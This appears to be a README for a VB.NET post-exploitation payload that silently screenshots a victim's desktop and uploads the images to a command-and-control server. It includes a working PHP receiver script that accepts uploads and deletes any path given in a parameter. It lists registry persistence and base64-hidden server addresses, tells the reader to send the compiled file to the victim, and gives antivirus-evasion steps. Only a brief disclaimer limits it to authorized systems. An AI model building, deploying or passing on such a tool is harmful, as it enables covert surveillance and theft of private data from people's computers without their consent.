Silent Screenshot Capture | Post Exploitation Payload | VB.NET
A simple payload to take the screenshot of victims desktop and upload it to the C&C.
Features:
- Persistent (Using Registry Run Key)
- Works in background
- Less Code Less Bugs and Less Detection 😉
- Deletes the screenshot from disk after upload it to C&C
- C&C server in base64
- Upload screenshots in organized way on C&C
- No port forwarding needed! works with a single php file
- [TODO] Machine Information
- [TODO] Encryption
- [TODO] Set interval remotely from C&C
Installation & Usage:
- Clone this repository.
- A webhosting i recommend namecheap
- Goto your public_html folder and make new PHP file and put below code in it
<?php
$del = $_GET[\"dellog\"];
$folder = $_GET[\"folder\"];
mkdir($folder,0777);
$file = $_GET[\"path\"];
if (!empty($_FILES[\"file\"])){
move_uploaded_file($_FILES[\"file\"][\"tmp_name\"],
$file . \"/\" . $_FILES[\"file\"][\"name\"]);
}
unlink($del);
?>
- Open the project in Visual Studio and the edit below variable in source code
Dim server As String = BaseDecode1(\"your server address here in base64 encoded\")
- and edit this variable below as well
Dim php As String = \"yourphpfilename.php?\" & \"folder=\"
- Just compile it and send it to the victim thats all !!
Million Dollar Advice 😉
To Avoid Antivirus Detection
- Change the app icon
- Generate new GUID
- Changes all the variables
- Obfuscate the code using Obfuscar
- Change the Assembly information
Donation:
If this tool has been useful for you, feel free to thank me by buying me a coffee 🙂
Disclaimer:
This tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without explicit permission is illegal.
License:
GNU GENERAL PUBLIC LICENSE
